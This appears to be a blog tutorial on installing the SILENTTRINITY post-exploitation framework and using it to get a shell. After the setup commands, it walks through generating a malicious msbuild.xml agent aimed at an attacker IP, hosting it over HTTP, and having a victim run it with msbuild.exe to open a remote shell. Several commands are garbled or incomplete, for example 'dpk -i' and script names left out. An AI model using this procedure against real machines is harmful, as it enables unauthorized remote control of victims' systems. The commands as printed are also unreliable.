Post Exploitation: SILENTTRINITY

Not too long ago, byt3bl33d3r released a tool called SILENTTRINITY. Essentially, it's an asynchronous post-exploitation agent powered by Python, IronPython, C# and .NET's DLR. Think of it as another PowerShell Empire or Meterpreter. It's awesome.

Below I'll go through a quick example of installing it and running the most basic agent. I will update this as I mess with ST more. But for now, let's just go over the most basics. Let's begin.


The installation of  SILENTTRINITY (or ST) is fairly straight forward and easy. Here's the steps I took in order to get it up and running on my Kali host.

Below is a link to ST Github:
There's also the same instructions listed on the ST Wiki:

We first need to make sure that Python 3.7.0 is installed. Here's a link to the python 3 documentation:

Once we have Python 3.7.0 installed, it's time to install Mono. 

When installing Mono, I followed the Debian 9 instructions. I also had to install xsp4 and gtk-sharp2 manually:

apt-get install mono-xsp4
apt-get install gtk-sharp2
make clean

Once complete, verify Mono works by following mono Basics:

Once Mono is installed, install IronPython. Download the appropriate .deb file and install:

dpk -i <debFile>

After that, it's time to download download SILENTTRINITY:

cd /opt/
git clone

Navigate to the SILENTTRINITY/server directory and install the requirements:

pip3 install -r requirements.txt

There may be times where some of the requirements don't install. Just install then manually. For example, hypercorn didn't install correctly for me, so I installed it:

git clone
cd hypercorn
python3.7 install

Once all the requirements are complete, you can begin by running ST.


In it's most basic form, we can create a msbuild.xml file that we will use to create our agent.

We first navigate to our ST server directory:

cd /opt/SILENTTRINITY/Server

We then generate our malicious xml file:

python3.7 msbuild http 8090 -ip <attackerIP>

We then run ST and reference our build file that will open up a listener on port 8090:

python3.7 -r msbuild.res

Next, open a new terminal and go to the same directory where msbuild.xml is. Host the file using something like python's SimpleHTTPServer:

python -m SimpleHTTPServer 8080

With your malicious file hosted and ST ready for the exploit, we then go to the victim machine and download the msbuild.xml file. Simply just open a browser, navigate to attacker IP and port 8080 and download msbuild.xml.

Once the xml file is downloaded, we can run the file:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml

At this point, look in your attacker machines ST instance and you should now have a shell!

Hope this has been helpful.

Until next time.